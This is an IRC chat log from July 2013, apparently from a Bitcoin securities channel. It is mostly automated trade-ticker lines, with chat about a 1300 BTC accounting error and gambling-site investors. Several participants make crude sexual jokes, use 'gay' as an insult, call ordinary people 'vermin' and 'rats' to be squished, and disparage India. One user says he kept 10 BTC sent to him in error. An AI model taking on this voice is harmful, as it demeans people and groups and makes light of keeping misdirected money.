[DMS.SELLING] 88 @ 0.024002 = 2.1122 BTC [-] Jul 15 05:00:33 [BTCTC] [DMS.SELLING] 1 @ 0.024001 BTC [-] Jul 15 05:00:35 [BTCTC] [DMS.SELLING] 5 @ 0.024001 = 0.12 BTC [-] Jul 15 05:04:20 [MPEX] [S.MPOE] 11289 @ 0.00081382 = 9.1872 BTC [+] Jul 15 05:06:06 [MPEX] [S.MPOE] 6500 @ 0.00081382 = 5.2898 BTC [+] Jul 15 05:09:46 [HAVELOCK] [AM100] 5 @ 0.040513 = 0.2026 BTC [-] Jul 15 05:15:24 [HAVELOCK] [VTX] 1 @ 0.7 BTC [-] Jul 15 05:15:55 [HAVELOCK] [VTX] 2 @ 0.7 = 1.4 BTC [-] Jul 15 05:16:52 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00445 = 0.89 BTC [+] Jul 15 05:18:58 [BTCTC] [AMC-PT] 1597 @ 0.0025 = 3.9925 BTC [+] Jul 15 05:19:21 [HAVELOCK] [AM100] 2 @ 0.0409 = 0.0818 BTC [+] Jul 15 05:19:24 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 15 05:21:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.041136 = 2.0568 BTC [-] Jul 15 05:21:28 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jul 15 05:21:54 [HAVELOCK] [AM100] 2 @ 0.0409 = 0.0818 BTC [+] Jul 15 05:22:36 [BTCTC] [TAT.ASICMINER] 19 @ 0.041136 = 0.7816 BTC [-] Jul 15 05:23:30 ;;nethash Jul 15 05:23:30 216766.685232 Jul 15 05:23:37 ;;bc,stats Jul 15 05:23:39 Current Blocks: 246621 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1346 blocks | Next Difficulty In About: 1 week, 1 day, 4 hours, 58 minutes, and 32 seconds | Next Difficulty Estimate: 29816000.9372 | Estimated Percent Change: 13.96301 Jul 15 05:24:40 [BTCTC] [TAT.ASICMINER] 6 @ 0.041136 = 0.2468 BTC [-] Jul 15 05:25:28 [BTCTC] [DMS.MINING] 10 @ 0.016 = 0.16 BTC [-] Jul 15 05:25:52 [BTCTC] [TAT.ASICMINER] 7 @ 0.041136 = 0.288 BTC [-] Jul 15 05:26:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.041136 = 0.1645 BTC [-] Jul 15 05:26:32 [BTCTC] [AMC-PT] 159 @ 0.0025 = 0.3975 BTC [+] Jul 15 05:27:13 [BTCTC] [TAT.ASICMINER] 9 @ 0.041136 = 0.3702 BTC [-] Jul 15 05:30:04 [BTCTC] [AMC-PT] 66 @ 0.0025 = 0.165 BTC [+] Jul 15 05:35:03 [MPEX] [S.MPOE] 768 @ 0.00081382 = 0.625 BTC [+] Jul 15 05:35:05 [MPEX] [S.MPOE] 10800 @ 0.00081408 = 8.7921 BTC [+] Jul 15 05:39:37 [HAVELOCK] [AM100] 350 @ 0.0406 = 14.21 BTC [-] Jul 15 05:41:25 [BTCTC] [ASICMINER-PT] 1 @ 4.284999 BTC [+] Jul 15 05:56:53 [BTCTC] [ASICMINER-PT] 1 @ 4.288499 BTC [+] Jul 15 05:57:00 [HAVELOCK] [AM100] 4 @ 0.040513 = 0.1621 BTC [-] Jul 15 05:58:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.042169 = 0.3374 BTC [+] Jul 15 05:58:30 [BTCTC] [ASICMINER-PT] 1 @ 4.2885 BTC [+] Jul 15 05:59:37 [HAVELOCK] [AM100] 68 @ 0.040513 = 2.7549 BTC [-] Jul 15 05:59:37 [HAVELOCK] [AM100] 32 @ 0.040512 = 1.2964 BTC [-] Jul 15 05:59:47 [BTCTC] [TAT.ASICMINER] 7 @ 0.041137 = 0.288 BTC [-] Jul 15 06:00:49 [BTCTC] [ASICMINER-PT] 1 @ 4.28999 BTC [+] Jul 15 06:00:52 [HAVELOCK] [AM100] 58 @ 0.040513 = 2.3498 BTC [+] Jul 15 06:02:18 [BTCTC] [ASICMINER-PT] 3 @ 4.260001 = 12.78 BTC [-] Jul 15 06:03:39 [BTCTC] [ASICMINER-PT] 1 @ 4.289989 BTC [+] Jul 15 06:04:22 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 06:05:01 [BTCTC] [AMC-PT] 999 @ 0.0025 = 2.4975 BTC [+] Jul 15 06:14:01 [HAVELOCK] [AM100] 20 @ 0.04050111 = 0.81 BTC [-] Jul 15 06:14:03 [HAVELOCK] [AM100] 4 @ 0.0405 = 0.162 BTC [-] Jul 15 06:17:15 [HAVELOCK] [AM100] 575 @ 0.0405 = 23.2875 BTC [-] Jul 15 06:18:04 [BTCTC] [DMS.PURCHASE] 1 @ 0.040172 BTC [-] Jul 15 06:24:24 [BTCTC] [BTC-BOND] 2 @ 0.009996 = 0.02 BTC [+] Jul 15 06:24:47 [BTCTC] [CRYPTO-TRADE] 3 @ 0.198 = 0.594 BTC [-] Jul 15 06:30:42 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [+] Jul 15 06:31:13 [BTCTC] [BASIC-MINING] 3 @ 0.679998 = 2.04 BTC [+] Jul 15 06:31:22 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jul 15 06:31:44 [BTCTC] [BASIC-MINING] 10 @ 0.679999 = 6.8 BTC [+] Jul 15 06:33:04 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [+] Jul 15 06:34:26 [BTCTC] [CRYPTO-TRADE] 3 @ 0.198 = 0.594 BTC [-] Jul 15 06:34:31 [HAVELOCK] [AM100] 1 @ 0.0408998 BTC [+] Jul 15 06:34:42 [BTCTC] [BASIC-MINING] 16 @ 0.68 = 10.88 BTC [+] Jul 15 06:37:10 [HAVELOCK] [SDSTM] 1 @ 0.0090009 BTC [-] Jul 15 06:41:45 [HAVELOCK] [AM100] 11 @ 0.04089979 = 0.4499 BTC [-] Jul 15 06:56:03 [BTCTC] [ASICMINER-PT] 2 @ 4.231001 = 8.462 BTC [-] Jul 15 06:56:10 [BTCTC] [AMC-PT] 1 @ 0.00249 BTC [-] Jul 15 06:58:45 [BTCTC] [AMC-PT] 3000 @ 0.00249 = 7.47 BTC [-] Jul 15 06:59:59 [BTCTC] [AMC-PT] 365 @ 0.00249 = 0.9089 BTC [-] Jul 15 07:02:36 [BTCTC] [AMC-PT] 16 @ 0.00249 = 0.0398 BTC [-] Jul 15 07:03:10 [BTCTC] [DMS.MINING] 713 @ 0.016 = 11.408 BTC [-] Jul 15 07:07:03 [BTCTC] [COGNITIVE] 1 @ 0.578931 BTC [-] Jul 15 07:18:28 [BTCTC] [S.DICE-PT] 191 @ 0.002368 = 0.4523 BTC [+] Jul 15 07:18:30 [BTCTC] [S.DICE-PT] 53 @ 0.002369 = 0.1256 BTC [+] Jul 15 07:18:30 [BTCTC] [S.DICE-PT] 100 @ 0.002369 = 0.2369 BTC [+] Jul 15 07:18:32 [BTCTC] [S.DICE-PT] 150 @ 0.002378 = 0.3567 BTC [+] Jul 15 07:18:33 [BTCTC] [S.DICE-PT] 250 @ 0.002379 = 0.5948 BTC [+] Jul 15 07:18:35 [BTCTC] [S.DICE-PT] 750 @ 0.00238 = 1.785 BTC [+] Jul 15 07:18:36 [BTCTC] [S.DICE-PT] 150 @ 0.002397 = 0.3596 BTC [+] Jul 15 07:18:43 [BTCTC] [S.DICE-PT] 500 @ 0.002398 = 1.199 BTC [+] Jul 15 07:18:54 [BTCTC] [S.DICE-PT] 500 @ 0.002399 = 1.1995 BTC [+] Jul 15 07:21:08 [BTCTC] [S.DICE-PT] 1 @ 0.0024 BTC [+] Jul 15 07:21:10 [BTCTC] [S.DICE-PT] 800 @ 0.0024 = 1.92 BTC [+] Jul 15 07:22:33 [BTCTC] [GSDPT] 1 @ 0.002295 BTC [-] Jul 15 07:23:11 [BTCTC] [GSDPT] 99 @ 0.002295 = 0.2272 BTC [-] Jul 15 07:27:03 http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb Jul 15 07:27:08 this is some ultra retarded shit Jul 15 07:28:04 butthurt because some dude didnt keep his domain until the end of time Jul 15 07:44:13 [BTCTC] [GSDPT] 400 @ 0.002295 = 0.918 BTC [-] Jul 15 07:48:44 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jul 15 07:51:25 [BTCTC] [DMS.MINING] 200 @ 0.016 = 3.2 BTC [-] Jul 15 07:53:06 [BTCTC] [DMS.MINING] 126 @ 0.016 = 2.016 BTC [-] Jul 15 07:53:16 [BTCTC] [BASIC-MINING] 12 @ 0.68 = 8.16 BTC [+] Jul 15 07:55:27 [MPEX] [S.MPOE] 1745 @ 0.0008144 = 1.4211 BTC [+] Jul 15 07:55:35 [MPEX] [S.MPOE] 6699 @ 0.00081299 = 5.4462 BTC [-] Jul 15 07:55:37 [MPEX] [S.MPOE] 6519 @ 0.00081086 = 5.286 BTC [-] Jul 15 08:01:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.042097 = 0.1263 BTC [+] **** BEGIN LOGGING AT Mon Jul 15 17:17:39 2013 Jul 15 17:19:30 $avg Jul 15 17:19:31 mircea_popescu: 96.94 Jul 15 17:21:43 [BTCTC] [TAT.ASICMINER] 43 @ 0.041599 = 1.7888 BTC [+] Jul 15 17:21:45 [BTCTC] [TAT.ASICMINER] 43 @ 0.0416 = 1.7888 BTC [+] Jul 15 17:21:59 [BTCTC] [TAT.ASICMINER] 2 @ 0.0416 = 0.0832 BTC [+] Jul 15 17:22:30 [BTCTC] [TAT.ASICMINER] 41 @ 0.0415 = 1.7015 BTC [-] Jul 15 17:24:54 [MPEX] [S.MPOE] 7995 @ 0.00081531 = 6.5184 BTC [+] Jul 15 17:24:56 [MPEX] [S.MPOE] 2060 @ 0.00081534 = 1.6796 BTC [+] Jul 15 17:24:57 [MPEX] [S.MPOE] 8450 @ 0.0008174 = 6.907 BTC [+] Jul 15 17:25:02 [MPEX] [S.MPOE] 3195 @ 0.00082043 = 2.6213 BTC [+] Jul 15 17:27:28 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 15 17:31:17 [HAVELOCK] [AM1] 1 @ 4.17 BTC [-] Jul 15 17:31:19 [HAVELOCK] [AM1] 1 @ 4.16100002 BTC [-] Jul 15 17:33:17 so it turns out that next week i'll be two years old. Jul 15 17:35:19 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 15 17:36:18 grats, will there be caek Jul 15 17:36:21 [BTCTC] [AMC-PT] 80 @ 0.0025 = 0.2 BTC [+] Jul 15 17:36:24 [BTCTC] [S.MPOE-PT] 1 @ 0.000818 BTC [-] Jul 15 17:37:27 there may be cunt Jul 15 17:37:33 but not for eveeryone! Jul 15 17:38:29 cunt-cake, looks like the romanian enjoy nowadays the french pleasures from the middle-ages Jul 15 17:38:47 i do not want to hear about your icing Jul 15 17:39:32 [BTCTC] [DMS.MINING] 24 @ 0.015093 = 0.3622 BTC [+] Jul 15 17:39:35 i do not have diabetes if that's what you're implying. Jul 15 17:39:56 [HAVELOCK] [AM100] 61 @ 0.040001 = 2.4401 BTC [+] Jul 15 17:40:06 cuntcake Jul 15 17:40:09 id have that. Jul 15 17:40:26 hi sir, we here rh house only server bukkake and cuntcake Jul 15 17:40:28 no pok at all. Jul 15 17:40:30 i'd rather have them separately Jul 15 17:40:41 davout youi're ocd. Jul 15 17:40:51 [BTCTC] [LTC-ATF.B2] 1 @ 0.010205 BTC [+] Jul 15 17:40:53 i'm what? Jul 15 17:41:08 you know those kids that whine if their peas and their potatoes touch ? Jul 15 17:41:11 that. Jul 15 17:41:15 hahahaha Jul 15 17:41:23 [HAVELOCK] [AM100] 48 @ 0.04 = 1.92 BTC [-] Jul 15 17:41:37 it would indeed be gay if your peas touched my potatoes Jul 15 17:41:44 [HAVELOCK] [AM1] 1 @ 4.33 BTC [+] Jul 15 17:41:50 lol Jul 15 17:42:36 i shall escort myself out, as we say in france "the shortest jokes are the least long" Jul 15 17:43:10 wasnt all that short Jul 15 17:43:14 [MPEX] [S.MPOE] 3264 @ 0.00081377 = 2.6561 BTC [-] Jul 15 17:43:16 [MPEX] [S.MPOE] 16500 @ 0.00081348 = 13.4224 BTC [-] Jul 15 17:43:26 that's what she said Jul 15 17:43:48 just slimey. Jul 15 17:44:30 "un peu gluant mais appétissant!" Jul 15 17:45:03 we still discussing the lady's cake ? Jul 15 17:45:25 [BTCTC] [AMC-PT] 66 @ 0.0025 = 0.165 BTC [+] Jul 15 17:45:35 [BTCTC] [ASICMINER-PT] 2 @ 4.24 = 8.48 BTC [-] Jul 15 17:45:42 oh, le roi lion Jul 15 17:46:37 [BTCTC] [TAT.ASICMINER] 24 @ 0.041308 = 0.9914 BTC [-] Jul 15 17:46:47 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 17:47:26 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 15 17:49:53 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 15 17:50:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:50:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:51:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:51:53 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 15 17:52:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:53:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:54:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:54:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.041994 BTC [+] Jul 15 17:55:01 who owns 777coin, do we know ? Jul 15 17:57:29 mircea_popescu: i got some email in russian today about this Jul 15 17:59:06 [BTCTC] [LTC-ATF.B2] 79 @ 0.0102 = 0.8058 BTC [-] Jul 15 17:59:48 aha ? Jul 15 18:00:30 [BTCTC] [LTC-ATF.B2] 20 @ 0.0102 = 0.204 BTC [-] Jul 15 18:01:14 [BTCTC] [BASIC-MINING] 1 @ 0.570011 BTC [+] Jul 15 18:02:27 [BTCTC] [ASICMINER-PT] 2 @ 4.24 = 8.48 BTC [-] Jul 15 18:04:43 mircea_popescu: i have a designer who wants to speak with you :P **** BEGIN LOGGING AT Mon Jul 15 18:31:19 2013 Jul 15 18:31:39 thestringpuller so go ahead Jul 15 18:31:50 [HAVELOCK] [SDSTM] 120 @ 0.0090009 = 1.0801 BTC [+] Jul 15 18:32:07 [HAVELOCK] [SDSTM] 1 @ 0.0090009 BTC [+] **** BEGIN LOGGING AT Mon Jul 15 18:33:39 2013 **** BEGIN LOGGING AT Mon Jul 15 18:34:27 2013 Jul 15 18:34:30 hm **** BEGIN LOGGING AT Mon Jul 15 18:35:14 2013 Jul 15 18:35:18 ok this is odd Jul 15 18:35:34 Usage: QUERY [-nofocus] , opens up a new privmsg window to someone Jul 15 18:35:43 [BTCTC] [B.YABMC] 3 @ 0.003 = 0.009 BTC [+] Jul 15 18:36:55 [BTCTC] [DMS.MINING] 100 @ 0.015 = 1.5 BTC [-] Jul 15 18:37:34 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 18:39:44 mp, I tried creating a template according to the S.MG heraldry specs noted, and it didn't center properly, but I assume you already saw my post Jul 15 18:40:55 the girl pointed it out ya Jul 15 18:43:16 [BTCTC] [DMS.SELLING] 3 @ 0.02401 = 0.072 BTC [-] Jul 15 18:44:45 [HAVELOCK] [AM100] 20 @ 0.04001 = 0.8002 BTC [+] Jul 15 18:44:47 [HAVELOCK] [AM100] 36 @ 0.04001 = 1.4404 BTC [+] Jul 15 18:44:48 [HAVELOCK] [AM100] 32 @ 0.04001 = 1.2803 BTC [+] Jul 15 18:44:49 [HAVELOCK] [AM100] 2 @ 0.04000001 = 0.08 BTC [-] Jul 15 18:44:50 [HAVELOCK] [AM100] 222 @ 0.04 = 8.88 BTC [-] Jul 15 18:44:51 [HAVELOCK] [AM100] 3 @ 0.03980398 = 0.1194 BTC [-] Jul 15 18:44:52 [HAVELOCK] [AM100] 86 @ 0.0398 = 3.4228 BTC [-] Jul 15 18:44:53 [HAVELOCK] [AM100] 200 @ 0.03975 = 7.95 BTC [-] Jul 15 18:44:54 [HAVELOCK] [AM100] 15 @ 0.03966 = 0.5949 BTC [-] Jul 15 18:44:55 [HAVELOCK] [AM100] 250 @ 0.039654 = 9.9135 BTC [-] Jul 15 18:46:18 Dooglus made a 1300btc mistake https://bitcointalk.org/index.php?topic=242962.msg2734952;topicseen#new Jul 15 18:49:55 ouch Jul 15 18:50:33 [HAVELOCK] [SDICE] 5 @ 0.204 = 1.02 BTC [-] Jul 15 18:50:44 [BTCTC] [TAT.ASICMINER] 88 @ 0.041365 = 3.6401 BTC [-] Jul 15 18:50:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.041364 = 2.0682 BTC [-] Jul 15 18:50:53 puts my losses in perspective Jul 15 18:50:54 [BTCTC] [TAT.ASICMINER] 48 @ 0.041362 = 1.9854 BTC [-] Jul 15 18:50:56 [BTCTC] [TAT.ASICMINER] 14 @ 0.04136 = 0.579 BTC [-] Jul 15 18:52:43 wow pretty big difference between AM100 on BTCTC and Havelock Jul 15 18:53:35 yeah it's a bit odd Jul 15 18:55:37 [HAVELOCK] [AM100] 16 @ 0.039701 = 0.6352 BTC [+] Jul 15 18:55:39 [HAVELOCK] [AM100] 18 @ 0.039701 = 0.7146 BTC [+] Jul 15 18:55:39 Guess it's because of the smaller userbase on havelock Jul 15 18:55:44 [HAVELOCK] [AM100] 12 @ 0.039701 = 0.4764 BTC [+] Jul 15 18:55:55 [BTCTC] [ASICMINER-PT] 5 @ 4.24 = 21.2 BTC [-] Jul 15 18:56:31 I think it's also because all of AM is a buyer's market right now Jul 15 18:56:41 not much eating of Asks going on anywhere Jul 15 18:56:42 whoa Jul 15 18:56:59 I think it's also because all of AM is a buyer's market right now << that is so lulzy. Jul 15 18:57:00 ? Jul 15 18:57:10 hehe Jul 15 18:57:15 basically what it says is "muppets are very greedy and very risk averse" Jul 15 18:57:27 lol and that SDSTM stock is still at 0.009, I wonder if bots are keeping it up? Jul 15 18:57:28 "they have no representation of failure and consequently will only take 100% losses or massive gains" Jul 15 18:57:38 but whoa was in respect to dooglus' mistake. Jul 15 18:57:46 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 15 18:57:47 take him a while to earn 1300 btc at 1% of 1% rate. Jul 15 18:57:55 [BTCTC] [AMC-PT] 114 @ 0.0025 = 0.285 BTC [+] Jul 15 18:58:04 and so another good man gets fucked over by the fact that he tries to make friends of said muppets Jul 15 18:58:14 instead of pissing all over their face at every turn, as he should. Jul 15 18:59:09 doesn't he have a ability to name whatever % he wants to take? Jul 15 18:59:22 like give all the investors a little notice Jul 15 18:59:25 and change it Jul 15 19:00:07 yeah. right. Jul 15 19:00:28 because the way he's behaved so far that's precisely what he's likely to do. Jul 15 19:02:17 sometimes it's hard to let go.. very hard. when i miss the spot to sell, i think "we already went down this far, it will turn around soon" Jul 15 19:02:22 [BTCTC] [TAT.ASICMINER] 7 @ 0.041992 = 0.2939 BTC [+] Jul 15 19:02:35 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 15 19:03:04 why not just decide what price you plan to sell at? Jul 15 19:03:06 http://www.theverge.com/2013/7/15/4524226/google-engineer-wins-first-microsoft-bug-bounty-award Jul 15 19:03:58 of course, but sometimes the selling target isn't reached before reversal Jul 15 19:04:48 there's a long, long road between actual investor and this sort of hobbist nonsense. Jul 15 19:05:41 [BTCTC] [ASICMINER-PT] 2 @ 4.24 = 8.48 BTC [-] Jul 15 19:07:09 theymos should add an equivalent of the banme tag on sa, except automated to all noob accounts. Jul 15 19:07:17 and just ban the shit out of them. there's just no fucking way. Jul 15 19:07:21 that jdice thread ? Jul 15 19:07:37 "So prime dice and coin roll.it with their max payouts below 20btc or below are just foolish? I am not saying we become more conservative than the competition, but we do not need our max bet to be 10 to 20 x the competition. They will not find another site with as fair a game and as big a max bet regardless. " Jul 15 19:07:40 fuckwit knows. Jul 15 19:08:03 make room, the mcdonalds clerk is now in a position of power and dominates teh market, he'll tell you how it is and what can happen! Jul 15 19:08:14 another bright suggestion : Jul 15 19:08:16 "You should be able to bet whatever you want, even more than the investor's money. Jul 15 19:08:16 But if you want to bet something huge (let's say 10k USD), it should split the bets into smaller ones, and ran them independantly." Jul 15 19:08:32 there's just.... there's just not enough pain and suffering available in the world to redeem these people. Jul 15 19:08:35 LOL Jul 15 19:08:48 that was a real lol too Jul 15 19:09:00 :) Jul 15 19:09:14 in the 1800s the ladies of society went to insane asylums to be amused by the nuts. Jul 15 19:09:18 that's basically it. Jul 15 19:10:22 but anyway, getting back at the entire "bitcoin for the masses" nonsense : it should be clear to everyone jkust from this small example that no, it will never happen. Jul 15 19:10:55 so you fancy yourself as a 1800s lady? Jul 15 19:10:56 bitcoin concentrates with some smart people, who will then proceed to simply mock and torture the entire rest of the world, ie, the sheeps goats and geese or w./e these lifeforms are Jul 15 19:10:57 and that's that. Jul 15 19:11:03 [HAVELOCK] [AM100] 1 @ 0.039701 BTC [+] Jul 15 19:11:17 depends on how the marketers approach it Jul 15 19:11:22 nope. Jul 15 19:11:36 there's no marketing involved. the masses are dumb. they like to be dumb, they have always been dumb. Jul 15 19:11:44 schemers, scammers, and salesman have ways to repackage and redefine something Jul 15 19:11:44 bitcoin is for smart people, and never the twain shall meet. Jul 15 19:11:50 only in their own mind. Jul 15 19:11:57 that matters about as much as what you call blue. Jul 15 19:12:01 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 15 19:12:17 well it won't be for lack of trying Jul 15 19:12:22 mircea_popescu: http://www.youtube.com/watch?v=ATXFCryzvgU Jul 15 19:12:23 now that's certain. Jul 15 19:12:26 [HAVELOCK] [SDSTM] 59 @ 0.0090009 = 0.5311 BTC [+] Jul 15 19:12:27 [HAVELOCK] [SDSTM] 34 @ 0.0091 = 0.3094 BTC [+] Jul 15 19:12:29 [HAVELOCK] [SDSTM] 10 @ 0.00925 = 0.0925 BTC [+] Jul 15 19:12:30 [HAVELOCK] [SDSTM] 3 @ 0.009295 = 0.0279 BTC [+] Jul 15 19:12:31 [HAVELOCK] [SDSTM] 3 @ 0.00939 = 0.0282 BTC [+] Jul 15 19:12:32 [HAVELOCK] [SDSTM] 10 @ 0.0095 = 0.095 BTC [+] Jul 15 19:12:32 mircea_popescu: (re: the Clever Poor) Jul 15 19:12:33 [HAVELOCK] [SDSTM] 10 @ 0.00975 = 0.0975 BTC [+] Jul 15 19:12:34 [HAVELOCK] [SDSTM] 77 @ 0.0098 = 0.7546 BTC [+] Jul 15 19:12:34 [HAVELOCK] [SDSTM] 64 @ 0.00981 = 0.6278 BTC [+] Jul 15 19:12:35 [HAVELOCK] [SDSTM] 10 @ 0.0099 = 0.099 BTC [+] Jul 15 19:12:36 [HAVELOCK] [SDSTM] 25 @ 0.009998 = 0.25 BTC [+] Jul 15 19:12:37 [HAVELOCK] [SDSTM] 695 @ 0.0099985 = 6.949 BTC [+] Jul 15 19:12:51 asciilifeform note that money doesn Jul 15 19:12:55 t even enter into it this time around. Jul 15 19:13:18 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00434 = 0.0174 BTC [-] Jul 15 19:13:38 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00434 = 0.026 BTC [-] Jul 15 19:14:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.041989 = 2.0995 BTC [-] Jul 15 19:14:18 mircea_popescu: my point here is that a swarm of arbitrarily-stupid vermin can still cause problems for their betters. Jul 15 19:14:34 mircea_popescu: don't end up as the young albatross. Jul 15 19:15:15 dooglus just has. Jul 15 19:15:31 the difference is exactly that : i call a rat a rat and squish it, much like a cat does. Jul 15 19:15:44 [BTCTC] [ASICMINER-PT] 14 @ 4.230001 = 59.22 BTC [-] Jul 15 19:15:51 some of the more naive souls buy into the entire french ideology with equality and whatnot and they end up eaten alive. Jul 15 19:15:52 life. Jul 15 19:16:18 ever see those temples in India with a sea of live rats in a giant pit? Jul 15 19:16:32 i saw some pictures of rats being fed milk. Jul 15 19:16:39 pretty disgusting place all around, india. anwyay. Jul 15 19:17:10 i'll gladly continue this convo later, i have a meetying now. Jul 15 19:18:31 [BTCTC] [CRYPTO-TRADE] 7 @ 0.195 = 1.365 BTC [-] Jul 15 19:20:13 [BTCTC] [TAT.ASICMINER] 38 @ 0.041989 = 1.5956 BTC [-] Jul 15 19:22:53 ThickAsThieves: have you ever played bit trip runner? Jul 15 19:26:17 I have not Jul 15 19:26:51 do you have steam? Jul 15 19:27:24 yeah on another PC Jul 15 19:27:34 should I check it out? Jul 15 19:28:47 if you like canabalt (which is a free flash game) it's like that but on steroids, with bosses and levels. Jul 15 19:28:54 [BTCTC] [TAT.ASICMINER] 107 @ 0.041986 = 4.4925 BTC [-] Jul 15 19:28:55 [BTCTC] [TAT.ASICMINER] 19 @ 0.041987 = 0.7978 BTC [+] Jul 15 19:28:57 [BTCTC] [TAT.ASICMINER] 35 @ 0.041989 = 1.4696 BTC [+] Jul 15 19:28:59 [BTCTC] [TAT.ASICMINER] 48 @ 0.041991 = 2.0156 BTC [+] Jul 15 19:29:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.041992 BTC [+] Jul 15 19:29:03 [BTCTC] [TAT.ASICMINER] 36 @ 0.041999 = 1.512 BTC [+] Jul 15 19:29:55 sounds cool Jul 15 19:30:00 i try not to game much Jul 15 19:30:11 i tried candy crush the other day Jul 15 19:30:25 hehe Jul 15 19:30:41 my only interest in it is seeing how far i could get without buying anything Jul 15 19:31:06 then i discovered the timeout limit so i quit Jul 15 19:31:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.041999 = 0.336 BTC [+] Jul 15 19:32:13 [BTCTC] [ASICMINER-PT] 11 @ 4.24 = 46.64 BTC [+] Jul 15 19:32:39 [BTCTC] [AMC-PT] 85 @ 0.0025 = 0.2125 BTC [+] Jul 15 19:34:14 [BTCTC] [COGNITIVE] 3 @ 0.581 = 1.743 BTC [+] Jul 15 19:34:16 [BTCTC] [COGNITIVE] 1 @ 0.581997 BTC [+] Jul 15 19:34:17 [BTCTC] [COGNITIVE] 6 @ 0.5896 = 3.5376 BTC [+] Jul 15 19:34:19 [BTCTC] [DMS.MINING] 1 @ 0.01578 BTC [+] Jul 15 19:34:20 [BTCTC] [COGNITIVE] 5 @ 0.5897 = 2.9485 BTC [+] Jul 15 19:34:22 [BTCTC] [COGNITIVE] 19 @ 0.59 = 11.21 BTC [+] Jul 15 19:36:42 [BTCTC] [DMS.MINING] 19 @ 0.01578 = 0.2998 BTC [+] Jul 15 19:36:44 [BTCTC] [DMS.MINING] 100 @ 0.015789 = 1.5789 BTC [+] Jul 15 19:36:45 [BTCTC] [DMS.MINING] 175 @ 0.01579 = 2.7633 BTC [+] Jul 15 19:36:47 [BTCTC] [DMS.MINING] 10 @ 0.015798 = 0.158 BTC [+] Jul 15 19:36:47 [BTCTC] [DMS.MINING] 30 @ 0.0158 = 0.474 BTC [+] Jul 15 19:36:55 [BTCTC] [DMS.MINING] 20 @ 0.0159 = 0.318 BTC [+] Jul 15 19:36:57 [BTCTC] [DMS.MINING] 25 @ 0.01599 = 0.3998 BTC [+] Jul 15 19:36:58 [BTCTC] [DMS.MINING] 20 @ 0.016 = 0.32 BTC [+] Jul 15 19:41:38 mhm.. i don't get your conclusions about doogle's loss Jul 15 19:42:02 i see it only as a stupid mistake - forgot to record the withdrawal into database Jul 15 19:42:32 and has nothing to do with stupid users Jul 15 19:43:20 fwiw, pretty much the same thing happened between mp and me... but as it was only 10BTC, i just kept it =P Jul 15 19:43:52 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Jul 15 19:44:12 [BTCTC] [COGNITIVE] 1 @ 0.550001 BTC [-] Jul 15 19:44:14 [BTCTC] [COGNITIVE] 2 @ 0.55 = 1.1 BTC [-] Jul 15 19:44:16 [BTCTC] [COGNITIVE] 4 @ 0.53 = 2.12 BTC [-] Jul 15 19:44:17 [BTCTC] [COGNITIVE] 2 @ 0.520001 = 1.04 BTC [-] Jul 15 19:44:19 [BTCTC] [COGNITIVE] 5 @ 0.52 = 2.6 BTC [-] Jul 15 19:48:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.041999 = 0.84 BTC [+] Jul 15 19:48:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.042 = 0.21 BTC [+] Jul 15 19:48:29 [BTCTC] [TAT.ASICMINER] 75 @ 0.042005 = 3.1504 BTC [+] Jul 15 19:48:42 i think the topic was separate Jul 15 19:48:51 the doog loss led mp rto reading the thread Jul 15 19:48:57 and finding idiocy Jul 15 19:49:59 [BTCTC] [DMS.MINING] 24 @ 0.016099 = 0.3864 BTC [+] Jul 15 19:51:01 [HAVELOCK] [AM100] 1 @ 0.04055 BTC [+] Jul 15 19:51:03 [HAVELOCK] [HIM] 1 @ 0.26300102 BTC [-] Jul 15 19:51:56 [HAVELOCK] [AM100] 7 @ 0.040784 = 0.2855 BTC [+] Jul 15 19:52:47 [HAVELOCK] [HIM] 40 @ 0.26300101 = 10.52 BTC [-] Jul 15 19:53:01 [BTCTC] [DMS.MINING] 6 @ 0.016245 = 0.0975 BTC [+] Jul 15 19:53:46 [BTCTC] [ASICMINER-PT] 1 @ 4.297 BTC [+] Jul 15 19:53:58 [BTCTC] 